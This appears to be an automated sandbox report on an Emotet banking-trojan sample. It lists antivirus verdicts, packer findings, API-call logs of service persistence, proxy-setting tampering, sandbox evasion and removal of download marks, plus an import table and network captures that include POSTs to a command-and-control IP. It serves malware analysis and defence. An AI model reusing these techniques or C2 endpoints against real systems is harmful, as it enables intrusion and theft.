11.2
0-day
54 个模型检测该样本为恶意!
重新分析
更多

473f169d0a08913a2739689bdbda20eef86526cde7b351b4f8e59d03d56d3567

9fedeab0a32cb5adc62eceb2a847adb3.exe

分析耗时

149s

最近分析

文件大小

360.0KB
静态报毒 动态报毒 100% ATTRIBUTE BANKERX CLASSIC CONFIDENCE DOWNLOADER33 ELDORADO EMOTET EMOTETU ENCPK GENCIRC HDCG HDZF HIGH CONFIDENCE HIGHCONFIDENCE KCLOUD KRYPTIK MALWARE@#5D2Q3GZ0AKML POSSIBLE R + MAL R337613 SCORE SMHPEMOTETTH SMTHC TRICKBOT UNSAFE VGL6SNL00N4 WQ0@B0M@3HMO YHYNC 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FQU!9FEDEAB0A32C 20201211 6.0.6.653
Alibaba Trojan:Win32/Emotet.bd1c86ca 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:BankerX-gen [Trj] 20201210 21.1.5827.0
Tencent Malware.Win32.Gencirc.10ba4397 20201211 1.0.0.1
Kingsoft Win32.Hack.Emotet.g.(kcloud) 20201211 2017.9.26.565
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619803089.267626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1619803077.533626
CryptGenKey
crypto_handle: 0x005ead80
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005e9780
flags: 1
key: fHñÜâ­0~¤V˧¿»óˆ
success 1 0
1619803089.408626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤H«g¿'Ç» Øè+#Ɵ›Ê(GW_…Ù1˜ÝbØI¨É)üŠp¢r¸îÈ”Ä´̨ÏV!d²§ªçW‘¬ëÃ# ¤¡1Ð_-ÍΊoØ ƒM :¡I8S T
blob_type: 1
flags: 64
success 1 0
1619803115.626626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤ÇÓ×="ê€'éiƒ¶#ɳޑBEy~íåiw$Žà'~Iyn•ZònAlsx(d]ž(NdáÄH1Af¸EH)’4ýf…4½Å(#½q‰³`t,eùüHs§‰š
blob_type: 1
flags: 64
success 1 0
1619803119.111626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤^À\¤ÝA!‹bŽ&=sL¿½Ýt Š üþËďÎL®*ù¯¦<ÿãeº³ëïcOùòIJ•v”SŒX쎪.›:âàÿ¦¤Ìa{N!p9ð££Ü›ûÖ »
blob_type: 1
flags: 64
success 1 0
1619803129.095626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤f“›xh †MjZ4fX°ØD£ù€vN”Q@Bœ\R "ä´Ç<ERá[%r’¿Òh2§á·,áûñ€ž“âÎ2~C/w²` qµIsf(ïq¤ „èÀøtËtVrÔ
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features Connection to IP address suspicious_request POST http://37.70.131.107/2eK2w0Nm/
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Performs some HTTP requests (7 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
request POST http://37.70.131.107/2eK2w0Nm/
request GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
request GET http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Sends data using the HTTP POST Method (2 个事件)
request POST http://37.70.131.107/2eK2w0Nm/
request POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619781448.53175
NtAllocateVirtualMemory
process_identifier: 520
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02260000
success 0 0
1619802661.86552
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00000000041e0000
success 0 0
1619803057.205626
NtAllocateVirtualMemory
process_identifier: 2436
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00500000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Public\Desktop\Google Chrome.lnk
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619781455.00075
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9fedeab0a32cb5adc62eceb2a847adb3.exe
newfilepath: C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe
newfilepath_r: C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9fedeab0a32cb5adc62eceb2a847adb3.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619803090.470626
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.10414778321143 section {'size_of_data': '0x0000f000', 'virtual_address': '0x00050000', 'entropy': 7.10414778321143, 'name': '.rsrc', 'virtual_size': '0x0000ea30'} description A section with a high entropy has been found
Expresses interest in specific running processes (1 个事件)
process hdwwiz.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619803089.767626
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (7 个事件)
host 172.217.24.14
host 186.80.169.128
host 190.63.7.166
host 37.70.131.107
host 51.38.134.203
host 203.208.41.65
host 203.208.41.98
Installs itself for autorun at Windows startup (1 个事件)
service_name hdwwiz service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619781458.18775
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x0063a058
display_name: hdwwiz
error_control: 0
service_name: hdwwiz
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
filepath_r: "C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
service_manager_handle: 0x00639bd0
desired_access: 2
service_type: 16
password:
success 6529112 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: pÇÁÅò=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619803093.048626
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: pÇÁÅò=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619803093.080626
RegSetValueExW
key_handle: 0x000003c4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe:Zone.Identifier
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.wq0@b0M@3HmO
FireEye Trojan.EmotetU.Gen.wq0@b0M@3HmO
Qihoo-360 Win32/Backdoor.902
McAfee Emotet-FQU!9FEDEAB0A32C
Cylance Unsafe
Zillya Trojan.Emotet.Win32.20446
SUPERAntiSpyware Trojan.Agent/Gen-Emotet
K7AntiVirus Trojan ( 005600261 )
Alibaba Trojan:Win32/Emotet.bd1c86ca
K7GW Trojan ( 005600261 )
Arcabit Trojan.EmotetU.Gen.EDC799
Cyren W32/Emotet.AKH.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-7773755-0
Kaspersky Backdoor.Win32.Emotet.gql
BitDefender Trojan.EmotetU.Gen.wq0@b0M@3HmO
Paloalto generic.ml
Tencent Malware.Win32.Gencirc.10ba4397
Ad-Aware Trojan.EmotetU.Gen.wq0@b0M@3HmO
TACHYON Backdoor/W32.Emotet.368640
Sophos Mal/Generic-R + Mal/EncPk-APM
Comodo Malware@#5d2q3gz0akml
F-Secure Trojan.TR/Crypt.Agent.yhync
DrWeb Trojan.DownLoader33.38818
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMTHC.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.fh
Emsisoft Trojan.Emotet (A)
Jiangmin Backdoor.Emotet.en
Webroot W32.Trojan.Trickbot
Avira TR/Crypt.Agent.yhync
Antiy-AVL Trojan/Win32.Emotet
Kingsoft Win32.Hack.Emotet.g.(kcloud)
Microsoft Trojan:Win32/Emotet.ARJ!MTB
AegisLab Trojan.Win32.Emotet.L!c
ZoneAlarm Backdoor.Win32.Emotet.gql
GData Trojan.EmotetU.Gen.wq0@b0M@3HmO
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.RL_Possible_smhpemotetth.R337613
ALYac Trojan.EmotetU.Gen.wq0@b0M@3HmO
VBA32 Backdoor.Emotet
Malwarebytes Trojan.Emotet
ESET-NOD32 a variant of Win32/Kryptik.HDZF
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMTHC.hp
Rising Trojan.Kryptik!1.C89F (CLASSIC)
Yandex Trojan.Kryptik!VgL6Snl00N4
Ikarus Trojan-Banker.Emotet
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 172.217.27.142:443
dead_host 172.217.24.14:443
dead_host 186.80.169.128:80
dead_host 190.63.7.166:8080
dead_host 51.38.134.203:8080
dead_host 192.168.56.101:49196
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-05-04 17:36:55

Imports

Library KERNEL32.dll:
0x4390e8 HeapSize
0x4390ec GetACP
0x4390f4 GetDriveTypeA
0x43910c SetHandleCount
0x439110 GetStdHandle
0x439114 HeapDestroy
0x439118 HeapCreate
0x43911c VirtualFree
0x439120 VirtualAlloc
0x439124 IsBadWritePtr
0x439128 LCMapStringA
0x43912c HeapReAlloc
0x439130 GetStringTypeA
0x439134 GetStringTypeW
0x43913c Sleep
0x439140 IsBadReadPtr
0x439144 IsBadCodePtr
0x439148 CompareStringA
0x43914c CompareStringW
0x439154 GetFileType
0x439158 SetStdHandle
0x43915c RaiseException
0x439160 GetProfileStringA
0x439164 InterlockedExchange
0x439168 TerminateProcess
0x43916c HeapFree
0x439170 HeapAlloc
0x439174 ExitProcess
0x439178 GetCommandLineA
0x43917c GetStartupInfoA
0x439180 RtlUnwind
0x439184 GetTickCount
0x439190 SetErrorMode
0x439194 GetShortPathNameA
0x439198 GetStringTypeExA
0x4391a0 DeleteFileA
0x4391a4 MoveFileA
0x4391a8 SetEndOfFile
0x4391ac UnlockFile
0x4391b0 LockFile
0x4391b4 FlushFileBuffers
0x4391b8 SetFilePointer
0x4391bc WriteFile
0x4391c0 ReadFile
0x4391c4 GetCurrentProcess
0x4391c8 DuplicateHandle
0x4391cc GetOEMCP
0x4391d0 GetCPInfo
0x4391d4 GetThreadLocale
0x4391d8 GetProcessVersion
0x4391e4 GlobalFlags
0x4391e8 TlsGetValue
0x4391ec LocalReAlloc
0x4391f0 TlsSetValue
0x4391f4 GlobalReAlloc
0x4391f8 TlsFree
0x4391fc GlobalHandle
0x439200 TlsAlloc
0x439204 LocalAlloc
0x439218 CreateFileA
0x439224 FindFirstFileA
0x439228 FindClose
0x43922c GetFileSize
0x439230 SetLastError
0x439234 MulDiv
0x439238 GetDiskFreeSpaceA
0x43923c GetFileTime
0x439240 SetFileTime
0x439244 GetFullPathNameA
0x439248 GetTempFileNameA
0x43924c lstrcpynA
0x439250 GetFileAttributesA
0x439254 lstrcatA
0x439258 GlobalGetAtomNameA
0x43925c GlobalFindAtomA
0x439260 lstrcpyA
0x439264 GetModuleHandleA
0x439268 GetProcAddress
0x43926c ReleaseMutex
0x439270 CreateMutexA
0x439274 LoadLibraryA
0x439278 FreeLibrary
0x43927c GlobalAddAtomA
0x439280 WaitForSingleObject
0x439284 CloseHandle
0x439288 GetModuleFileNameA
0x43928c GlobalAlloc
0x439290 GlobalDeleteAtom
0x439294 lstrcmpA
0x439298 lstrcmpiA
0x43929c GetCurrentThread
0x4392a0 GetCurrentThreadId
0x4392a4 GlobalLock
0x4392a8 GlobalUnlock
0x4392ac GlobalFree
0x4392b0 LockResource
0x4392b4 FormatMessageA
0x4392b8 LocalFree
0x4392bc MultiByteToWideChar
0x4392c0 WideCharToMultiByte
0x4392c4 lstrlenA
0x4392d0 LoadLibraryExW
0x4392d4 FindResourceA
0x4392d8 LoadResource
0x4392dc GetVersion
0x4392e0 SizeofResource
0x4392e4 GetLastError
0x4392e8 LCMapStringW
Library USER32.dll:
0x439340 LoadIconA
0x439344 MapWindowPoints
0x439348 GetSysColor
0x43934c ScreenToClient
0x439350 EqualRect
0x439354 DeferWindowPos
0x439358 BeginDeferWindowPos
0x43935c EndDeferWindowPos
0x439360 ScrollWindow
0x439364 GetScrollInfo
0x439368 SetScrollInfo
0x43936c ShowScrollBar
0x439370 GetScrollRange
0x439374 SetScrollRange
0x439378 GetScrollPos
0x43937c SetScrollPos
0x439380 GetTopWindow
0x439384 IsChild
0x439388 GetCapture
0x43938c WinHelpA
0x439390 wsprintfA
0x439394 GetClassInfoA
0x439398 RegisterClassA
0x43939c GetMenu
0x4393a0 GetMenuItemCount
0x4393a4 GetSubMenu
0x4393a8 GetMenuItemID
0x4393ac DefWindowProcA
0x4393b0 CreateWindowExA
0x4393b4 GetClassLongA
0x4393b8 SetPropA
0x4393bc UnhookWindowsHookEx
0x4393c0 GetPropA
0x4393c4 CallWindowProcA
0x4393c8 RemovePropA
0x4393cc GetMessageTime
0x4393d0 GetMessagePos
0x4393d4 GetForegroundWindow
0x4393d8 SetForegroundWindow
0x4393e0 IntersectRect
0x4393e8 IsIconic
0x4393ec GetWindowPlacement
0x4393f0 MapDialogRect
0x4393f8 SetFocus
0x4393fc ShowWindow
0x439400 SetWindowPos
0x439404 MoveWindow
0x439408 SetWindowLongA
0x43940c GetDlgCtrlID
0x439414 SetWindowTextA
0x439418 PostThreadMessageA
0x43941c MessageBeep
0x439424 LoadBitmapA
0x439428 GetMenuState
0x43942c ModifyMenuA
0x439430 SetMenuItemBitmaps
0x439434 CheckMenuItem
0x439438 EnableMenuItem
0x43943c GetFocus
0x439440 GetMessageA
0x439444 TranslateMessage
0x439448 DispatchMessageA
0x43944c GetKeyState
0x439450 CallNextHookEx
0x439454 ValidateRect
0x439458 IsWindowVisible
0x43945c PeekMessageA
0x439460 GetCursorPos
0x439464 SetWindowsHookExA
0x439468 GetLastActivePopup
0x43946c MessageBoxA
0x439470 SetCursor
0x439474 ShowOwnedPopups
0x439478 UpdateWindow
0x43947c EnableWindow
0x439480 SendMessageA
0x439484 UnregisterClassA
0x439488 HideCaret
0x43948c ShowCaret
0x439490 ExcludeUpdateRgn
0x439494 DrawFocusRect
0x439498 DefDlgProcA
0x43949c IsWindowUnicode
0x4394a0 InvalidateRect
0x4394a4 IsWindow
0x4394a8 PostQuitMessage
0x4394ac GetNextDlgTabItem
0x4394b0 EndDialog
0x4394b4 GetActiveWindow
0x4394b8 SetActiveWindow
0x4394bc GetSystemMetrics
0x4394c4 DestroyWindow
0x4394c8 GetWindowLongA
0x4394cc GetDlgItem
0x4394d0 IsWindowEnabled
0x4394d4 EnumChildWindows
0x4394d8 GetWindowRect
0x4394e0 InflateRect
0x4394e4 CharUpperA
0x4394e8 GetNextDlgGroupItem
0x4394f0 IsDialogMessageA
0x4394f4 CharNextA
0x4394f8 OffsetRect
0x4394fc InSendMessage
0x439500 CreateWindowExW
0x439504 GetWindowTextA
0x439508 GetClientRect
0x43950c CopyRect
0x439510 IsZoomed
0x439514 GetParent
0x439518 PostMessageA
0x43951c GetWindow
0x439520 SetRect
0x439524 DestroyIcon
0x439528 GetSysColorBrush
0x43952c LoadCursorA
0x439530 PtInRect
0x439534 GetClassNameA
0x439538 LoadStringA
0x43953c BringWindowToTop
0x439540 UnpackDDElParam
0x439544 ReuseDDElParam
0x439548 SetMenu
0x43954c LoadMenuA
0x439550 DestroyMenu
0x439554 GetDesktopWindow
0x439558 ReleaseCapture
0x439560 LoadAcceleratorsA
0x439564 SetRectEmpty
0x439568 GrayStringA
0x43956c DrawTextA
0x439570 TabbedTextOutA
0x439574 EndPaint
0x439578 BeginPaint
0x43957c GetWindowDC
0x439580 ClientToScreen
0x439584 FindWindowA
0x439588 GetDC
0x43958c SendDlgItemMessageA
0x439590 ReleaseDC
0x439594 AdjustWindowRectEx
Library GDI32.dll:
0x439040 OffsetViewportOrgEx
0x439044 SetViewportExtEx
0x439048 ScaleViewportExtEx
0x43904c SetWindowExtEx
0x439050 ScaleWindowExtEx
0x439054 IntersectClipRect
0x439058 DeleteObject
0x43905c SetViewportOrgEx
0x439060 GetDeviceCaps
0x439064 GetViewportExtEx
0x439068 GetWindowExtEx
0x43906c CreateSolidBrush
0x439070 PtVisible
0x439074 RectVisible
0x439078 TextOutA
0x43907c ExtTextOutA
0x439080 Escape
0x439084 GetTextColor
0x439088 GetBkColor
0x43908c GetMapMode
0x439090 SetMapMode
0x439094 SetBkMode
0x439098 GetStockObject
0x43909c SelectObject
0x4390a0 RestoreDC
0x4390a4 SaveDC
0x4390a8 DeleteDC
0x4390ac DPtoLP
0x4390b0 LPtoDP
0x4390b4 PatBlt
0x4390b8 SetBkColor
0x4390bc SetTextColor
0x4390c0 GetClipBox
0x4390c4 CreateBitmap
0x4390c8 GetObjectA
0x4390cc EnumFontFamiliesExA
0x4390d0 CreateDIBitmap
0x4390d4 GetTextExtentPointA
0x4390d8 BitBlt
0x4390dc CreateCompatibleDC
0x4390e0 CreateFontA
Library comdlg32.dll:
0x4395ac GetSaveFileNameA
0x4395b0 GetFileTitleA
0x4395b4 GetOpenFileNameA
Library WINSPOOL.DRV:
0x43959c OpenPrinterA
0x4395a0 DocumentPropertiesA
0x4395a4 ClosePrinter
Library ADVAPI32.dll:
0x439000 RegCloseKey
0x439004 RegEnumKeyA
0x439008 RegOpenKeyA
0x43900c RegDeleteKeyA
0x439010 SetFileSecurityA
0x439014 GetFileSecurityA
0x439018 RegQueryValueExA
0x43901c RegOpenKeyExA
0x439020 RegSetValueA
0x439024 RegCreateKeyA
0x439028 RegQueryValueA
0x43902c RegSetValueExA
0x439030 RegCreateKeyExA
Library SHELL32.dll:
0x439320 ExtractIconA
0x439324 DragQueryFileA
0x439328 DragFinish
0x43932c SHGetMalloc
0x439330 SHBrowseForFolderA
0x439338 SHGetFileInfoA
Library COMCTL32.dll:
0x439038
Library oledlg.dll:
0x4395fc
Library ole32.dll:
0x4395c0 OleUninitialize
0x4395c4 OleInitialize
0x4395c8 CoTaskMemAlloc
0x4395cc CoTaskMemFree
0x4395dc CoGetClassObject
0x4395e0 CLSIDFromString
0x4395e4 CLSIDFromProgID
0x4395ec CoRevokeClassObject
0x4395f0 OleFlushClipboard
Library OLEPRO32.DLL:
0x439318
Library OLEAUT32.dll:
0x4392f0 SysFreeString
0x4392f4 SysAllocStringLen
0x4392f8 VariantClear
0x439300 VariantCopy
0x439304 VariantChangeType
0x439308 SysAllocString
0x439310 SysStringLen

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49194 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49195 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49202 116.11.67.6 www.download.windowsupdate.com 80
192.168.56.101 49193 203.208.41.33 redirector.gvt1.com 80
192.168.56.101 49192 203.208.41.66 update.googleapis.com 443
192.168.56.101 49199 37.70.131.107 80
192.168.56.101 49201 37.70.131.107 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53210 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 55169 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 60088 114.114.114.114 53
192.168.56.101 60911 114.114.114.114 53
192.168.56.101 64214 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50433 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 54991 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 03 Mar 2021 06:32:16 GMT
If-None-Match: "0d8f4f3f6fd71:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=18109-32357
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=6841-18108
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
